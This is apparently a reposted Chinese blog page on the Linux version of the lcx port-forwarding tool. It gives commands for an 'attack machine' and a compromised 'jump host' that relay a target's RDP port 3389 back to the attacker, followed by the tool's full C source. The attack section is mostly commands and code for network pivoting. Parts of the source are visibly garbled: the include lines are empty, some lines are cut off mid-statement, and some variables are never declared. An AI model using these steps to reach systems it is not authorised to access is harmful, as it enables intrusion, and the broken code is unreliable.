博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
lcx端口转发 linux版
阅读量:5052 次
发布时间:2019-06-12

本文共 12366 字,大约阅读时间需要 41 分钟。

一、端口转发使用

1、攻击机上执行以下命令

./lcx -p1 2222 -p2 3389 -m 2

在本地监听3389端口,并将发送到本机3389端口的数据传递到本机2222端口

2、跳板机上执行以下命令

./lcx -h1 attackip -p1 2222 -h2 dstip -p2 3389 -m 3

与攻击机建立连接,并将来自攻击机2222端口的数据全部转发到目标机端口的3389 端口

3、以上连接建立完成后,就可以通过连接攻击机的3389端口,进行访问目标机的3389端口

二、代码

/* Socket data transport tool* by bkbll(bkbll@cnhonker.net)* [bkbll@mobile socket]$ uname -a* Linux mobile 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux* [bkbll@mobile socket]$ gcc -o trtool trtool.c* [bkbll@mobile socket]$ ./trtool* Socket data transport tool* by bkbll(bkbll@cnhonker.net)* Usage:./trtool -m method [-h1 host1] -p1 port1 [-h2 host2] -p2 port2 [-v] [-log filename]* -v: version* -h1: host1* -h2: host2* -p1: port1* -p2: port2* -log: log the data* -m: the action method for this tool* 1: listen on PORT1 and connect to HOST2:PORT2* 2: listen on PORT1 and PORT2* 3: connect to HOST1:PORT1 and HOST2:PORT2*/#include 
     
      #include 
      
       #include 
       
        #include 
        
         #include 
         
          #include 
          
           #include 
           
            #include 
            
             #include 
             
              #include 
              
               #include 
               
                #include 
                
                  #define VERSION "2.2"#define TIMEOUT 300#define max(a,b) (a)>(b)?(a):(b)#define MAXSIZE 10240#define HOSTLEN 40#define CONNECT_NUMBER 5 /* define function here */void usage(char *s);void transdata(int fd1,int fd2);void closeallfd(int);void makelog(char *buffer,int length);int testifisvalue(char *str);int bind2conn(int port1,char *host,int port2);int bind2bind(int port1,int port2);int conn2conn(char *host1,int port1,char *host2,int port2);int create_socket();int create_serv(int sockfd,int port);int client_connect(int sockfd,char* server,int port); /* define GLOBAL varible here */extern int errno;FILE *fp; int main(int argc,char **argv){ char **p; char host1[HOSTLEN],host2[HOSTLEN]; int port1=0,port2=0,method=0; int length; char *logfile=NULL; p=argv; memset(host1,0,HOSTLEN); memset(host2,0,HOSTLEN); while(*p) { if(strcmp(*p,"-v")==0) { printf("Socket data transport tool.\r\nVersion:%s\r\n",VERSION); p++; continue; } if(strcmp(*p,"-h1")==0) { if(testifisvalue(*(p+1))==1) { length=(strlen(*(p+1))>HOSTLEN-1)?HOSTLEN-1:strlen(*(p+1)); strncpy(host1,*(++p),length); } p++; continue; } if(strcmp(*p,"-h2")==0) { if(testifisvalue(*(p+1))==1) { length=(strlen(*(p+1))>HOSTLEN-1)?HOSTLEN-1:strlen(*(p+1)); strncpy(host2,*(++p),length); } p++; continue; } if(strcmp(*p,"-p1")==0) { if(testifisvalue(*(p+1))==1) port1=atoi(*(++p)); p++; continue; } if(strcmp(*p,"-p2")==0) { if(testifisvalue(*(p+1))==1) port2=atoi(*(++p)); p++; continue; } if(strcmp(*p,"-m")==0) { if(testifisvalue(*(p+1))==1) method=atoi(*(++p)); p++; continue; } if(strcmp(*p,"-log")==0) { if(testifisvalue(*(p+1))==1) logfile=*(++p); else { printf("[ERROR]:must supply logfile name\r\n"); exit(0); } p++; continue; } p++; } signal(SIGCLD,SIG_IGN); signal(SIGINT,&closeallfd); if(logfile !=NULL) { fp=fopen(logfile,"a"); if(fp == NULL ) { perror("open logfile"); exit(0); } } makelog("######################## start ################\r\n",49); switch(method) { case 0: usage(argv[0]); break; case 1: if((port1==0) || (port2==0)) { printf("[ERROR]:must supply PORT1 and PORT2.\r\n"); break; } if(strlen(host2)==0) { printf("[ERROR]:must supply HOST2.\r\n"); break; } bind2conn(port1,host2,port2); break; case 2: if((port1==0) || (port2==0)) { printf("[ERROR]:must supply PORT1 and PORT2.\r\n"); break; } bind2bind(port1,port2); break; case 3: if((port1==0) || (port2==0)) { printf("[ERROR]:must supply PORT1 and PORT2.\r\n"); break; } if(strlen(host1)==0) { printf("[ERROR]:must supply HOST1.\r\n"); break; } if(strlen(host2)==0) { printf("[ERROR]:must supply HOST2.\r\n"); break; } conn2conn(host1,port1,host2,port2); break; default: usage(argv[0]); } closeallfd(0);} int testifisvalue(char *str){ if(str == NULL ) return(0); if(str[0]=='-') return(0); return(1);} void usage(char *s){ printf("Socket data transport tool\r\n"); printf("by bkbll(bkbll@cnhonker.net)\r\n\r\n"); printf("Usage:%s -m method [-h1 host1] -p1 port1 [-h2 host2] -p2 port2 [-v] [-log filename]\r\n",s); printf(" -v: version\r\n"); printf(" -h1: host1\r\n"); printf(" -h2: host2\r\n"); printf(" -p1: port1\r\n"); printf(" -p2: port2\r\n"); printf(" -log: log the data\r\n"); printf(" -m: the action method for this tool\r\n"); printf(" 1: listen on PORT1 and connect to HOST2:PORT2\r\n"); printf(" 2: listen on PORT1 and PORT2\r\n"); printf(" 3: connect to HOST1:PORT1 and HOST2:PORT2\r\n"); closeallfd(0);} int bind2conn(int port1,char *host,int port2){ int sockfd,sockfd1,sockfd2; struct sockaddr_in remote; int size; int pid; char buffer[1024]; memset(buffer,0,1024); if((sockfd=create_socket())==0) exit(0); if(create_serv(sockfd,port1)==0) { close(sockfd1); exit(0); } size=sizeof(struct sockaddr); while(1) { printf("waiting for response.........\n"); if((sockfd1=accept(sockfd,(struct sockaddr *)&remote,(socklen_t *)&size))<0) { perror("accept error\n"); continue; } printf("accept a client from %s:%d\n",inet_ntoa(remote.sin_addr),ntohs(remote.sin_port)); if((sockfd2=create_socket())==0) { close(sockfd1); continue; } printf("make a connection to %s:%d....",host,port2); fflush(stdout); if(client_connect(sockfd2,host,port2)==0) { close(sockfd2); sprintf(buffer,"[SERVER]connection to %s:%d error\r\n",host,port2); write(sockfd1,buffer,strlen(buffer)); memset(buffer,0,1024); close(sockfd1); continue; } printf("ok\r\n"); pid=fork(); if(pid==0) transdata(sockfd1,sockfd2); // sleep(2); close(sockfd1); close(sockfd2); } } int bind2bind(int port1,int port2){ int fd1,fd2,sockfd1,sockfd2; struct sockaddr_in client1,client2; int size1,size2; int pid; if((fd1=create_socket())==0) exit(0); if((fd2=create_socket())==0) exit(0); printf("binding port %d......",port1); fflush(stdout); if(create_serv(fd1,port1)==0) { close(fd1); exit(0); } printf("ok\r\n"); printf("binding port %d......",port2); fflush(stdout); if(create_serv(fd2,port2)==0) { close(fd2); exit(0); } printf("ok\r\n"); size1=size2=sizeof(struct sockaddr); while(1) { printf("waiting for response on port %d.........\n",port1); if((sockfd1=accept(fd1,(struct sockaddr *)&client1,(socklen_t *)&size1))<0) { perror("accept1 error"); continue; } printf("accept a client on port %d from %s,waiting another on port %d....\n",port1,inet_ntoa(client1.sin_addr),port2); if((sockfd2=accept(fd2,(struct sockaddr *)&client2,(socklen_t *)&size2))<0) { perror("accept2 error"); close(sockfd1); continue; } printf("accept a client on port %d from %s\n",port2,inet_ntoa(client2.sin_addr)); pid=fork(); if(pid==0) transdata(sockfd1,sockfd2); //sleep(2); close(sockfd1); close(sockfd2); }} int conn2conn(char *host1,int port1,char *host2,int port2){ int sockfd1,sockfd2; int pid; fd_set fds; int l; int result; char buffer[MAXSIZE]; while(1) { if((sockfd1=create_socket())==0) exit(0); if((sockfd2=create_socket())==0) exit(0); printf("[+] make a connection to %s:%d....\r\n",host1,port1); fflush(stdout); if(client_connect(sockfd1,host1,port1)==0) { printf("[-] connect to host1 failed\r\n"); close(sockfd1); close(sockfd2); continue; } printf("[+] host1 connected\r\n"); l=0; memset(buffer,0,MAXSIZE); //fixed by Twi1ight 2012.09.12 while(1) { FD_ZERO(&fds); FD_SET(sockfd1, &fds); if (select(sockfd1+1, &fds, NULL, NULL, NULL) < 0 ) { if (errno == EINTR) continue; break; } if (FD_ISSET(sockfd1, &fds)) { l=read(sockfd1, buffer, MAXSIZE); break; } sleep(5); } if(l<=0) { printf("[-] there is a error...Create a new connection.\r\n"); continue; } while(1) { printf("[+] make a connection to %s:%d....\r\n",host2,port2); fflush(stdout); if(client_connect(sockfd2,host2,port2)==0) { printf("[-] connect to host2 failed\r\n"); close(sockfd1); close(sockfd2); continue; } if(write(sockfd2,buffer,l) < 0) { printf("[-] send failed.\r\n"); continue; } l=0; memset(buffer,0,MAXSIZE); break; } printf("[+] all hosts connected!\r\n"); pid=fork(); if(pid==0) transdata(sockfd1,sockfd2); //sleep(2); close(sockfd1); close(sockfd2); }} void transdata(int fd1,int fd2){ struct timeval timeset; fd_set readfd,writefd; int result,i=0; char read_in1[MAXSIZE],send_out1[MAXSIZE]; char read_in2[MAXSIZE],send_out2[MAXSIZE]; int read1=0,totalread1=0,send1=0; int read2=0,totalread2=0,send2=0; int sendcount1,sendcount2; int maxfd; struct sockaddr_in client1,client2; int structsize1,structsize2; char host1[20],host2[20]; int port1=0,port2=0; char tmpbuf1[100],tmpbuf2[100]; memset(host1,0,20); memset(host2,0,20); memset(tmpbuf1,0,100); memset(tmpbuf2,0,100); if(fp!=NULL) { structsize1=sizeof(struct sockaddr); structsize2=sizeof(struct sockaddr); if(getpeername(fd1,(struct sockaddr *)&client1,(socklen_t *)&structsize1)<0) { strcpy(host1,"fd1"); } else { printf("got,ip:%s,port:%d\r\n",inet_ntoa(client1.sin_addr),ntohs(client1.sin_port)); strcpy(host1,inet_ntoa(client1.sin_addr)); port1=ntohs(client1.sin_port); } if(getpeername(fd2,(struct sockaddr *)&client2,(socklen_t *)&structsize2)<0) { strcpy(host2,"fd2"); } else { printf("got,ip:%s,port:%d\r\n",inet_ntoa(client2.sin_addr),ntohs(client2.sin_port)); strcpy(host2,inet_ntoa(client2.sin_addr)); port2=ntohs(client2.sin_port); } sprintf(tmpbuf1,"\r\n########### read from %s:%d ####################\r\n",host1,port1); sprintf(tmpbuf2,"\r\n########### reply from %s:%d ####################\r\n",host2,port2); } maxfd=max(fd1,fd2)+1; memset(read_in1,0,MAXSIZE); memset(read_in2,0,MAXSIZE); memset(send_out1,0,MAXSIZE); memset(send_out2,0,MAXSIZE); timeset.tv_sec=TIMEOUT; timeset.tv_usec=0; while(1) { FD_ZERO(&readfd); FD_ZERO(&writefd); FD_SET(fd1,&readfd); FD_SET(fd1,&writefd); FD_SET(fd2,&writefd); FD_SET(fd2,&readfd); result=select(maxfd,&readfd,&writefd,NULL,&timeset); if((result<0) && (errno!=EINTR)) { perror("select error"); break; } else if(result==0) { printf("time out\n"); break; } if(FD_ISSET(fd1,&readfd)) { /* 不能超过MAXSIZE-totalread1,不然send_out1会溢出 */ if(totalread1
                 
                  0) { send1=write(fd2,send_out1+sendcount1,totalread1); if(send1==0)break; if((send1<0) && (errno!=EINTR)) { perror("unknow error"); err=1; break; } if((send1<0) && (errno==ENOSPC)) break; sendcount1+=send1; totalread1-=send1; } if(err==1) break; if((totalread1>0) && (sendcount1>0)) { /* 移动未发送完的数据到开始 */ memcpy(send_out1,send_out1+sendcount1,totalread1); memset(send_out1+totalread1,0,MAXSIZE-totalread1); } else memset(send_out1,0,MAXSIZE); } if(FD_ISSET(fd2,&readfd)) { if(totalread2
                  
                   0) { send2=write(fd1,send_out2+sendcount2,totalread2); if(send2==0)break; if((send2<0) && (errno!=EINTR)) { perror("unknow error"); err2=1; break; } if((send2<0) && (errno==ENOSPC)) break; sendcount2+=send2; totalread2-=send2; } if(err2==1) break; if((totalread2>0) && (sendcount2 > 0)) { /* 移动未发送完的数据到开始 */ memcpy(send_out2,send_out2+sendcount2,totalread2); memset(send_out2+totalread2,0,MAXSIZE-totalread2); } else memset(send_out2,0,MAXSIZE); } } close(fd1); close(fd2); printf("ok,I closed the two fd\r\n"); //exit(0);} void closeallfd(int n){ int i; printf("Let me exit..."); fflush(stdout); for(i=3;i<256;i++) { close(i); } if(fp != NULL) { fprintf(fp,"exited\r\n"); fclose(fp); } printf("all overd\r\n"); exit(0);}void makelog(char *buffer,int length){ if(fp !=NULL) { //fprintf(fp,"%s",buffer); write(fileno(fp),buffer,length); fflush(fp); }} int create_socket(){ int sockfd; sockfd=socket(AF_INET,SOCK_STREAM,0); if(sockfd<0) { perror("create socket error"); return(0); } return(sockfd);} int create_serv(int sockfd,int port){ struct sockaddr_in srvaddr; int on=1; bzero(&srvaddr,sizeof(struct sockaddr)); srvaddr.sin_port=htons(port); srvaddr.sin_family=AF_INET; srvaddr.sin_addr.s_addr=htonl(INADDR_ANY); setsockopt(sockfd,SOL_SOCKET,SO_REUSEADDR,&on,sizeof(on)); //so I can rebind the port if(bind(sockfd,(struct sockaddr *)&srvaddr,sizeof(struct sockaddr))<0) { perror("error"); return(0); } if(listen(sockfd,CONNECT_NUMBER)<0) { perror("listen error\n"); return(0); } return(1);} int client_connect(int sockfd,char* server,int port){ struct sockaddr_in cliaddr; struct hostent *host; if(!(host=gethostbyname(server))) { printf("gethostbyname(%s) error:%s\n",server,strerror(errno)); return(0); } bzero(&cliaddr,sizeof(struct sockaddr)); cliaddr.sin_family=AF_INET; cliaddr.sin_port=htons(port); cliaddr.sin_addr=*((struct in_addr *)host->h_addr); if(connect(sockfd,(struct sockaddr *)&cliaddr,sizeof(struct sockaddr))<0) { perror("[-] error"); return(0); } return(1);}

 

转载于:https://www.cnblogs.com/zlgxzswjy/p/9722287.html

你可能感兴趣的文章
学习python:day1
查看>>
css3动画属性
查看>>
第九次团队作业-测试报告与用户使用手册
查看>>
Equal Sides Of An Array
查看>>
CentOS笔记-用户和用户组管理
查看>>
Mongodb 基本命令
查看>>
Qt中QTableView中加入Check列实现
查看>>
“富豪相亲大会”究竟迷失了什么?
查看>>
控制文件的备份与恢复
查看>>
返回代码hdu 2054 A==B?
查看>>
Flink独立集群1
查看>>
iOS 8 地图
查看>>
20165235 第八周课下补做
查看>>
[leetcode] 1. Two Sum
查看>>
iOS 日常工作之常用宏定义大全
查看>>
PHP的SQL注入技术实现以及预防措施
查看>>
MVC Razor
查看>>
软件目录结构规范
查看>>
Windbg调试Sql Server 进程
查看>>
linux调度器系列
查看>>
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!-- 愿君每日到此一游!
当前时间: 2024-11-15 04:31:05   当前IP: 3.135.204.160   联系邮箱:javaeecc@qq.com     Copyright © 2020 - 2022 baihongyu.com 京ICP备2021015314号-2
强烈建议你试试无所不能的CHAT-GPT,快点击我
强烈建议你试试无所不能的CHAT-GPT,快点击我